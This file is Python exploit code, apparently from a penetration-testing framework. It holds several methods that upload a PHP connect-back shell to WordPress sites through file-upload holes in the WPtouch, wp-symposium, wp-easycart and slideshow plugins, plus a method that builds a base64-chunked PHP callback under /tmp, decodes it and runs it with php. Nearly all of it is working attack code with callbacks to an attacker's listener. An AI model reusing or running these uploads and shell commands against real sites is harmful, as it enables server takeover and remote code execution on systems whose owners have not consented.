  def get_php_to_mosdef(self):
    """
    Return the PHP stage-1 loader for this exploit's callback.

    The listener address is read from self.callback (ip, port) and handed
    to get_php_stage1 together with an empty bad-character string.
    """
    # No characters are excluded from the generated stage for this target.
    return get_php_stage1("", self.callback.ip, self.callback.port)
    def uploadShell(self, exheaders):
        """
        Upload a shell through our authenticated session
        The plugin doesn't restrict file upload types, vulnerability #2

        Args:
            exheaders: list of (name, value) header tuples. Mutated in place:
                the form-urlencoded Content-Type entry is removed (ValueError
                if it is absent) and the multipart entry is appended.

        Returns:
            False when the response body contains "sufficient permissions",
            True otherwise; no other failure mode is detected here.
        """
        # Generate the PHP callback
        host = self.callback.ip
        port = self.callback.port
        badChars = ""  # no characters are excluded from the stage for this target

        # This is the code that'll be inserted on the remote machine
        # if you want a custom shell do it here
        ret = "<?php " + get_php_stage1(badChars, host, port) + " ?>"

        # Create our payload to POST
        # Multipart/form-data body assembled by hand; the boundary literal
        # 576a5sdf6 must match the Content-Type header set further down.
        payload = ""
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"action\"\r\n"
        payload += "\r\nupload_file\r\n"
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"file_type\"\r\n"
        payload += "\r\nhomescreen_image\r\n"
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"setting_name\"\r\n"
        payload += "\r\nwptouch__foundation__android_others_icon\r\n"
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"wp_nonce\"\r\n"
        payload += "\r\n%s\r\n" % self.nonce  # self.nonce is assumed to be set before this call — TODO confirm
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"myfile\"; filename=\"%s.php\"\r\n" % self.shellFile
        payload += "Content-Type: application/octet-stream\r\n\r\n"
        payload += "%s\r\n" % ret
        payload += "--576a5sdf6--\r\n"  # closing delimiter

        # Update connection parameters
        url = self.url + "wp-admin/admin-ajax.php"  # assumes self.url ends with "/" — TODO confirm
        exheaders.remove(("Content-Type", "application/x-www-form-urlencoded"))
        exheaders.append(
            ("Content-Type", "multipart/form-data; boundary=576a5sdf6"))

        # Make the POST
        (res, code) = spkproxy.urlopen(url,
                                       extraheaders=exheaders,
                                       data=payload,
                                       verb="POST",
                                       hostname=self.hostname,
                                       exploit=self,
                                       entireresponse=False,
                                       return_response_code=True)
        # Check for failure
        # Only the body is inspected; the status code returned above is unused.
        text = res.read()
        if re.search("sufficient permissions", text):
            self.log(
                "[EE] The account provided did not have the required permissions to exploit this vulnerability"
            )
            return False
        else:
            self.log("[ii] Shell upload seems to have been successful")
        return True
 def get_php_to_mosdef(self, host, port):
     """
     Return the PHP stage-1 loader pointed at host:port.

     The callback address is logged through self.log before the stage is
     generated; no bad characters are excluded.
     """
     self.log("Using PHPMULTI callback of %s:%d" % (host, port))
     # Empty filter: nothing is excluded from the generated PHP.
     return get_php_stage1('', host, port)
    def uploadShell(self, exheaders):
        """
        Simplest shell upload ever, just POST to the page :)

        Args:
            exheaders: list of (name, value) header tuples. Mutated in place:
                the form-urlencoded Content-Type entry is removed (ValueError
                if it is absent) and the multipart entry is appended.

        Returns:
            False when the response body contains the substring "error",
            True otherwise; the status code is not consulted.
        """
        # Generate the PHP callback
        host = self.callback.ip
        port = self.callback.port
        badChars = ""  # no characters are excluded from the stage for this target

        # This is the code that'll be inserted on the remote machine
        # if you want a custom shell do it here
        ret = "<?php " + get_php_stage1(badChars, host, port) + " ?>"

        # Create our payload to POST
        # Multipart/form-data body assembled by hand; the boundary literal
        # 576a5sdf6 must match the Content-Type header set further down.
        payload = ""
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"uploader_uid\"\r\n"
        payload += "\r\n1\r\n"
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"uploader_dir\"\r\n"
        payload += "\r\n\r\n"  # Giving this a directory like (./) will wipe that directory :(
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"uploader_url\"\r\n"
        payload += "\r\n" + self.url + "wp-content/plugins/wp-symposium/server/php\r\n"  # assumes self.url ends with "/" — TODO confirm
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"files[]\"; filename=\"%s.php\"\r\n" % self.shellFile
        payload += "Content-Type: application/octet-stream\r\n\r\n"
        payload += "%s\r\n" % ret
        payload += "--576a5sdf6--\r\n"  # closing delimiter

        # Update connection parameters
        exheaders.remove(("Content-Type", "application/x-www-form-urlencoded"))
        exheaders.append(
            ("Content-Type", "multipart/form-data; boundary=576a5sdf6"))

        # Make the POST
        (res, code) = spkproxy.urlopen(
            self.url + "wp-content/plugins/wp-symposium/server/php/",
            extraheaders=exheaders,
            data=payload,
            verb="POST",
            hostname=self.hostname,
            exploit=self,
            entireresponse=False,
            return_response_code=True)
        # Check for failure
        # Substring match: any body that mentions "error" anywhere counts as failure.
        text = res.read()
        if re.search("error", text):
            self.log(
                "[EE] The wp-content/plugins/wp-symposium/server/php/ directory may not be writable, see exploit notes for more information"
            )
            return False
        else:
            self.log("[ii] Shell upload seems to have been successful")
        return True
    def get_php_to_mosdef(self):
        """
        Return the PHP stage-1 loader for the configured callback.

        The listener address comes from self.callback and is logged at INFO
        level before the stage is built; no bad characters are excluded.
        """
        ip, port = self.callback.ip, self.callback.port
        logging.info("Using PHPMULTI callback of %s:%d" % (ip, port))
        # Nothing to avoid for this target, so the filter is empty.
        return get_php_stage1("", ip, port)
    def uploadShell(self, exheaders):
        """
        Upload a shell through our authenticated session using the found nonce

        Args:
            exheaders: list of (name, value) header tuples. Mutated in place:
                the multipart Content-Type entry is appended (nothing is
                removed here, unlike the sibling uploadShell variants).

        Returns:
            True only for a 200 response whose last body line contains a
            value of the form d.dd other than "0.00"; False otherwise.
        """
        # Generate the PHP callback
        host = self.callback.ip
        port = self.callback.port
        badChars = ""  # no characters are excluded from the stage for this target

        # This is the code that'll be inserted on the remote machine, if you want a custom shell do it here
        ret = "<?php " + get_php_stage1(badChars, host, port) + " ?>"

        # Create our payload to POST
        # Multipart/form-data body assembled by hand; the boundary literal
        # 576a5sdf6 must match the Content-Type header set further down.
        payload = ""
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"name\"\r\n"
        payload += "\r\n%s\r\n" % self.shellFile
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"_ajax_nonce\"\r\n"
        payload += "\r\n%s\r\n" % self.nonce  # self.nonce is assumed to be set before this call — TODO confirm
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"action\"\r\n"
        payload += "\r\nfile_upload\r\n"
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"async-upload\"; filename=\"%s.php\"\r\n" % self.shellFile
        payload += "Content-Type: text/plain \r\n\r\n"
        payload += "%s\r\n" % ret
        payload += "--576a5sdf6\r\n"

        # Update connection parameters
        url = self.url + "wp-admin/admin-ajax.php"  # assumes self.url ends with "/" — TODO confirm
        exheaders.append(
            ("Content-Type", "multipart/form-data; boundary=576a5sdf6"))

        # Make the POST
        (res, code) = spkproxy.urlopen(url,
                                       extraheaders=exheaders,
                                       data=payload,
                                       verb="POST",
                                       hostname=self.hostname,
                                       exploit=self,
                                       entireresponse=True,
                                       return_response_code=True)
        # Check for failure
        if code == 200:
            data = res.read().splitlines()
            # Non-raw pattern: "\d" is not a recognised string escape, so the
            # backslash survives by accident (r"..." is the conventional form).
            # An empty body would raise IndexError on data[-1]. Note that `ret`
            # is rebound here from the PHP stage to the match object.
            ret = re.search("(\d\.\d\d)", data[-1])
            if ret and ret.groups()[0] != "0.00":
                self.log("[ii] Callback upload successful")
                return True

        return False
    def get_php_to_mosdef(self):
        """
        Return the PHP stage-1 loader for the configured callback.

        The listener address is read from self.callback and logged at INFO
        level; the stage is generated by phplistener.get_php_stage1 with an
        empty bad-character string.
        """
        ip = self.callback.ip
        port = self.callback.port
        logging.info("Using PHPMULTI callback of {0}:{1}".format(ip, port))
        # Nothing is filtered for this target.
        return phplistener.get_php_stage1("", ip, port)
    def get_php_to_mosdef(self):
        """
        Return the PHP stage-1 loader for the configured callback.

        Reads ip/port from self.callback and the bad-character string from
        self.badstring; logs at INFO level before and after generation.
        """
        ip, port = self.callback.ip, self.callback.port
        logging.info("Using PHPMULTI callback for %s:%d" % (ip, port))
        from phplistener import get_php_stage1  # stage-1 generator lives in the listener module

        stage = get_php_stage1(self.badstring, ip, port)
        logging.info("Generated callback shell")
        return stage
    def get_php_to_mosdef(self):
        """
        Return the PHP stage-1 loader for the configured callback.

        Reads the listener address from self.callback and the bad-character
        string from self.badstring; the address is logged via self.log_info.
        """
        ip = self.callback.ip
        port = self.callback.port
        self.log_info("Using PHPMULTI callback for %s:%d" % (ip, port))
        from phplistener import get_php_stage1  # stage-1 generator lives in the listener module

        return get_php_stage1(self.badstring, ip, port)
    def uploadShell(self, exheaders):
        """
        Upload a shell through our authenticated session
        The plugin doesn't restrict file upload types, vulnerability #2

        Args:
            exheaders: list of (name, value) header tuples. Mutated in place:
                the form-urlencoded Content-Type entry is removed (ValueError
                if it is absent) and the multipart entry is appended.

        Returns:
            Always True; a non-200 status is only logged, not treated as failure.
        """
        # Generate the PHP callback
        host = self.callback.ip
        port = self.callback.port
        badChars = ""  # no characters are excluded from the stage for this target

        # This is the code that'll be inserted on the remote machine
        # if you want a custom shell do it here
        ret = "<?php " + get_php_stage1(badChars, host, port) + " ?>"

        # Create our payload to POST
        # Multipart/form-data body assembled by hand; the boundary literal
        # 576a5sdf6 must match the Content-Type header set further down.
        payload = ""
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"datemd5\"\r\n"
        payload += "\r\n1\r\n"
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"Filedata\"; filename=\"%s.php\"\r\n" % self.shellFile
        payload += "Content-Type: application/octet-stream\r\n\r\n"
        payload += "%s\r\n" % ret
        payload += "--576a5sdf6--\r\n"  # closing delimiter

        # Update connection parameters
        url = self.url + "wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php"  # assumes self.url ends with "/" — TODO confirm
        exheaders.remove(("Content-Type", "application/x-www-form-urlencoded"))
        exheaders.append(
            ("Content-Type", "multipart/form-data; boundary=576a5sdf6"))

        # Make the POST
        (res, code) = spkproxy.urlopen(url,
                                       extraheaders=exheaders,
                                       data=payload,
                                       verb="POST",
                                       hostname=self.hostname,
                                       exploit=self,
                                       entireresponse=False,
                                       return_response_code=True)
        # Check for failure
        # The response body is never read here; only the status code is logged.
        if code == 200:
            self.log_info("Shell upload may have been successful")
        else:
            self.log_info(
                "Received unexpected status code of %d when attempting upload, proceeding anyway"
                % code)
        return True
 def get_php_to_mosdef(self):
     """
     Creates a string which when included in php's eval() will download and execute
     MOSDEF

     The stage is wrapped in short open tags ("<? ... ?>"); "/" is passed as
     the bad character, and the finished fragment is logged via self.log.
     """
     ip = self.callback.ip
     port = self.callback.port
     self.log("Using PHPMULTI callback of %s:%d" % (ip, port))
     from phplistener import get_php_stage1  # stage-1 generator lives in the listener module

     # "/" is treated as unusable in this code path (original note: "theoretically").
     stage = "<? " + get_php_stage1("/", ip, port) + " ?>"
     self.log("Generated callback shell of: %s" % stage)
     return stage
    def get_php_to_mosdef(self):
        """
        Creates a string which when included in php's eval() will download and execute
        MOSDEF

        Returns "" (after logging) when self.callback is not set; otherwise the
        stage for self.callback's ip/port with no bad characters excluded.
        """
        # Guard: without a callback there is no address for the stage to use.
        if not self.callback:
            self.log("No callback specified! You need to specify a callback for this exploit!")
            return ""

        ip, port = self.callback.ip, self.callback.port
        self.log("Using PHPMULTI callback of %s:%d" % (ip, port))
        # No bad characters for this target.
        return get_php_stage1("", ip, port)
    def get_php_to_mosdef(self):
        """
        Creates a string which when included in php's eval() will download and execute
        MOSDEF

        The listener address is read from self.callback and logged via
        self.log; "/" is passed as the bad character.
        """
        ip, port = self.callback.ip, self.callback.port
        self.log("Using PHPMULTI callback of %s:%d" % (ip, port))
        from phplistener import get_php_stage1  # stage-1 generator lives in the listener module

        # "/" cannot be used in this code path, so it is excluded from the stage.
        return get_php_stage1("/", ip, port)
    def generateCommands(self):
        """
        Create the list of commands we'll be executing to get a connect back shell

        Builds the PHP stage for self.callback, base64-encodes it, splits the
        encoding into 50-byte chunks (appended to self.shellChunks) and returns
        shell commands that write the chunks under /tmp, reassemble and decode
        them, and run the result with php.

        Returns:
            list of command strings in execution order.

        Note: Python 2 only as written (xrange; b64encode applied to a str).
        """
        # Create a list to store our commands in order of execution
        commands = [
                     "rm -f /tmp/x* test*" # Delete previous attempts; "test*" is relative to the cwd, not /tmp
                   ]

        # Create the PHP callback
        host = self.callback.ip
        port = self.callback.port
        badchars = ""  # no characters are excluded from the stage for this target

        # If you're using a custom PHP shell, add it here
        ret = "<?php " + get_php_stage1(badchars, host, port) + " ?>"
        phpCallback = base64.b64encode(ret)

        # Split out b64'd callback into 50 byte chunks
        # self.shellChunks is appended to and never reset here, so repeated
        # calls would accumulate chunks — TODO confirm this is intended.
        for x in xrange(0, len(phpCallback), 50):
            self.shellChunks.append(phpCallback[x:x + 50])

        # Dump those chunks into files
        x = 0
        for chunk in self.shellChunks:
            commands.append("echo %s >> /tmp/x%d" % (chunk, x))
            x += 1

        # Concatenate files while removing newlines
        # head -c -1 emits all but the last byte of each file (the newline echo added).
        tempCmd = " cd /tmp; head -c -1 -q "
        for y in xrange(0, x):
            tempCmd += "x%d " % y
        tempCmd += "> /tmp/test"
        commands.append(tempCmd)

        # Unbase64 the callback
        commands.append("base64 -d /tmp/test > /tmp/test.php")

        # Run it
        commands.append("php /tmp/test.php")
        return commands
    def uploadShell(self, exheaders):
        """
        Upload a shell through our authenticated session

        Args:
            exheaders: list of (name, value) header tuples. Mutated in place:
                the form-urlencoded Content-Type entry is removed (ValueError
                if it is absent) and the multipart entry is appended.

        Returns:
            False when the response body contains "sufficient permissions",
            True otherwise; the status code is not consulted.
        """
        # Generate the PHP callback
        host = self.callback.ip
        port = self.callback.port
        badChars = ""  # no characters are excluded from the stage for this target

        # This is the code that'll be inserted on the remote machine, if you want a custom shell do it here
        ret = "<?php " + get_php_stage1(badChars, host, port) + " ?>"

        # Create our payload to POST
        # Multipart/form-data body assembled by hand; the boundary literal
        # 576a5sdf6 must match the Content-Type header set further down.
        # Field names mirror the plugin's "Slide[...]" form.
        payload = ""
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"Slide[id]\"\r\n"
        payload += "\r\n\r\n"
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"Slide[order]\"\r\n"
        payload += "\r\n\r\n"
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"Slide[title]\"\r\n"
        payload += "\r\n%s\r\n" % self.slideTitle  # self.slideTitle is assumed to be set before this call — TODO confirm
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"Slide[description]\"\r\n"
        payload += "\r\nDefault slide\r\n"  # This value appears to be overridden by the Slide[title] value
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"Slide[showinfo]\"\r\n"
        payload += "\r\nboth\r\n"
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"Slide[iopacity]\"\r\n"
        payload += "\r\n70\r\n"
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"Slide[type]\"\r\n"
        payload += "\r\nfile\r\n"
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"image_file\"; filename=\"%s.php\"\r\n" % self.shellFile
        payload += "Content-Type: application/octet-stream\r\n\r\n"
        payload += "%s\r\n" % ret
        payload += "--576a5sdf6--\r\n"
        payload += "Content-Disposition: form-data; name=\"Slide[image_url]\"\r\n"
        payload += "\r\n\r\n"
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"Slide[uselink]\"\r\n"
        payload += "\r\nN\r\n"
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"Slide[link]\"\r\n"
        payload += "\r\n\r\n"
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"Slide[linktarget]\"\r\n"
        payload += "\r\nself\r\n"
        payload += "--576a5sdf6\r\n"
        payload += "Content-Disposition: form-data; name=\"submit\"\r\n"
        payload += "\r\nSave Slide\r\n"
        payload += "--576a5sdf6\r\n"

        # Update connection parameters
        url = self.url + "wp-admin/admin.php?page=slideshow-slides&method=save"  # assumes self.url ends with "/" — TODO confirm
        exheaders.remove(("Content-Type", "application/x-www-form-urlencoded"))
        exheaders.append(
            ("Content-Type", "multipart/form-data; boundary=576a5sdf6"))

        # Make the POST
        (res, code) = spkproxy.urlopen(url,
                                       extraheaders=exheaders,
                                       data=payload,
                                       verb="POST",
                                       hostname=self.hostname,
                                       exploit=self,
                                       entireresponse=False,
                                       return_response_code=True)
        # Check for failure
        # Only a permissions error in the body is recognised; any other
        # outcome is reported as success without logging.
        text = res.read()
        if re.search("sufficient permissions", text):
            self.log(
                "[EE] The account provided did not have the required permissions to exploit this vulnerability"
            )
            return False

        return True